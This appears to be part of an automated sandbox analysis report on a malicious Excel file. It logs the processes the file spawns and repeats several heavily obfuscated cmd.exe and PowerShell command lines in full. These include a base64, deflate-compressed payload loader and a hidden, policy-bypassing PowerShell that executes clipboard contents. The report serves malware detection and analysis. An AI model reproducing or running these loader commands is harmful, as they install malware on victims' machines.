Source: unknown	Process created: C:\Windows\System32\cmd.exe CmD /V:ON/C 'set 7T=oMPResSIoNmODe]::''D`EcO`Mpr`&&set fXO9=`m`pR&&set lM='Uauer5J/QU&&set OJo=3rTzG&&set J3=t',(\''{0}&&set du4k=jNexb&&set xCZA=Ii'') } ^^^^^^^^&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=''&&set 54K=\''( )) ) ; [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\'' -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Home}[&&set 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr0yJa+CgVQ64wlYgUsz&&set qXy=VB&&set 87kx=oJOLevLKG&&set mti=6&&set md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&set W39h=11Hy&&set fQN=oM2&&set Igd=-f'yp','e',( \''{1}{&&set qK=Ro5A5SnpE3C/') &&set vJIZ=oBjECT') &&set Vkgt=ki6','U+ZEre4WJW&&set AXSR=','R','eaCH') {.(''{0}{1}{2}''-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Windows&&set kmP='k',&&set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \''{3}{1}{0}{4}{2}\'' -f 'nt
Source: unknown	Process created: C:\Windows\System32\cmd.exe CmD /V:ON/C 'set 7T=oMPResSIoNmODe]::''D`EcO`Mpr`&&set fXO9=`m`pR&&set lM='Uauer5J/QU&&set OJo=3rTzG&&set J3=t',(\''{0}&&set du4k=jNexb&&set xCZA=Ii'') } ^^^^^^^^&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=''&&set 54K=\''( )) ) ; [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\'' -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Home}[&&set 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr0yJa+CgVQ64wlYgUsz&&set qXy=VB&&set 87kx=oJOLevLKG&&set mti=6&&set md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&set W39h=11Hy&&set fQN=oM2&&set Igd=-f'yp','e',( \''{1}{&&set qK=Ro5A5SnpE3C/') &&set vJIZ=oBjECT') &&set Vkgt=ki6','U+ZEre4WJW&&set AXSR=','R','eaCH') {.(''{0}{1}{2}''-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Windows&&set kmP='k',&&set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \''{3}{1}{0}{4}{2}\'' -f 'nt
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG'
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CmD /V:ON/C 'set 7T=oMPResSIoNmODe]::''D`EcO`Mpr`&&set fXO9=`m`pR&&set lM='Uauer5J/QU&&set OJo=3rTzG&&set J3=t',(\''{0}&&set du4k=jNexb&&set xCZA=Ii'') } ^^^^^^^^&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=''&&set 54K=\''( )) ) ; [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\'' -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Home}[&&set 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr0yJa+CgVQ64wlYgUsz&&set qXy=VB&&set 87kx=oJOLevLKG&&set mti=6&&set md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&set W39h=11Hy&&set fQN=oM2&&set Igd=-f'yp','e',( \''{1}{&&set qK=Ro5A5SnpE3C/') &&set vJIZ=oBjECT') &&set Vkgt=ki6','U+ZEre4WJW&&set AXSR=','R','eaCH') {.(''{0}{1}{2}''-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Windows&&set kmP='k',&&set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \''{3}{1}{0}{4}{2}\'' -f 'nt	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CmD /V:ON/C 'set 7T=oMPResSIoNmODe]::''D`EcO`Mpr`&&set fXO9=`m`pR&&set lM='Uauer5J/QU&&set OJo=3rTzG&&set J3=t',(\''{0}&&set du4k=jNexb&&set xCZA=Ii'') } ^^^^^^^^&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=''&&set 54K=\''( )) ) ; [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\'' -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Home}[&&set 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr0yJa+CgVQ64wlYgUsz&&set qXy=VB&&set 87kx=oJOLevLKG&&set mti=6&&set md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&set W39h=11Hy&&set fQN=oM2&&set Igd=-f'yp','e',( \''{1}{&&set qK=Ro5A5SnpE3C/') &&set vJIZ=oBjECT') &&set Vkgt=ki6','U+ZEre4WJW&&set AXSR=','R','eaCH') {.(''{0}{1}{2}''-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Windows&&set kmP='k',&&set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \''{3}{1}{0}{4}{2}\'' -f 'nt	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )	Jump to behavior

PowerShell case anomaly found

Show sources

Source: unknown	Process created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: unknown	Process created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
